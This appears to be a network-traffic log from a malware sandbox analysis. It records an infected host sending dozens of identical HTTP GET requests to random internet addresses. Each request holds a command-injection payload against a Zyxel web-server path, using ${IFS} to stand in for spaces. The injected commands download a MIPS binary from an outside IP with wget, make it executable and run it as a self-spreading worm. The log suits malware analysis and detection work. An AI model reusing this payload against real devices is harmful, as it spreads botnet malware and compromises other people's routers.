                                          Jan 14, 2024 15:46:09.846052885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2819192.168.2.233922281.251.67.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846086025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2820192.168.2.23436622.208.112.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846103907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2821192.168.2.2354482125.123.172.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846136093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2822192.168.2.2338106173.169.83.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846159935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2823192.168.2.235678466.166.99.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846185923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2824192.168.2.235777695.107.81.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846180916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2825192.168.2.233468619.206.204.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846219063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2826192.168.2.2352264167.75.225.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846240997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2827192.168.2.2343228131.224.193.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846265078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2828192.168.2.2358044148.175.18.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846280098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2829192.168.2.2344496122.138.56.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846307993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2830192.168.2.235543813.45.240.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846328020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2831192.168.2.2338112115.90.136.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846381903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2832192.168.2.2341856216.98.47.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846393108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2833192.168.2.233590878.190.186.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846420050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2834192.168.2.2341568207.37.226.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846452951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2835192.168.2.2348656137.75.40.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846471071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2836192.168.2.23476348.168.13.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846510887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2837192.168.2.235616874.83.188.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846543074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2838192.168.2.2347388196.105.193.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846570969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2839192.168.2.2335094107.202.12.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846605062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2840192.168.2.2337110144.226.157.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846632004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2841192.168.2.2359240208.162.251.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846659899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2842192.168.2.2350566190.200.92.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846688986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2843192.168.2.2351286206.177.211.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846707106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2844192.168.2.2347488120.85.157.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846714020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2845192.168.2.2350100108.40.218.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846750021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2846192.168.2.2360578147.80.37.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846750021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2847192.168.2.233475686.25.76.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846784115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2848192.168.2.2359748163.116.149.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846827984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2849192.168.2.234487896.39.106.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846856117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2850192.168.2.2333312153.57.179.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846869946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2851192.168.2.2349300180.187.157.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846901894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2852192.168.2.2334730223.129.226.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846913099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2853192.168.2.2345784153.226.43.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846955061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2854192.168.2.234222047.134.25.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846961021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2855192.168.2.234305435.100.101.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849550962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2856192.168.2.233422642.89.238.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849576950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2857192.168.2.2350146133.177.1.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849592924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2858192.168.2.23507045.239.76.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849612951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2859192.168.2.2337044221.107.147.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849615097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2860192.168.2.2335564142.203.204.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849632025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2861192.168.2.2346846219.225.113.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849653006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2862192.168.2.2354306201.14.196.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849701881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2863192.168.2.2358720207.183.127.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849723101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2864192.168.2.2358810143.223.86.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849737883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2865192.168.2.2352202111.55.48.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849762917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2866192.168.2.2350906203.214.171.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849786997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2867192.168.2.2348300218.195.236.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849865913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2868192.168.2.2355588114.216.74.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849914074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2869192.168.2.234779840.137.29.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849914074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2870192.168.2.2349726121.60.27.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849942923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2871192.168.2.23605561.222.144.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.849962950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2872192.168.2.234232034.225.199.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.850002050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2873192.168.2.2351626145.20.179.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.850016117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2874192.168.2.2337914123.156.157.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.850020885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2875192.168.2.2341446203.183.249.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.850073099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2876192.168.2.2335868111.21.77.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.850081921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2877192.168.2.233554096.88.156.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865297079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2878192.168.2.2334612197.2.108.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865315914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2879192.168.2.23493849.79.2.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865375042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2880192.168.2.235606697.236.161.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.865394115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2881192.168.2.2355842129.49.212.84443
                                          TimestampBytes transferredDirectionData
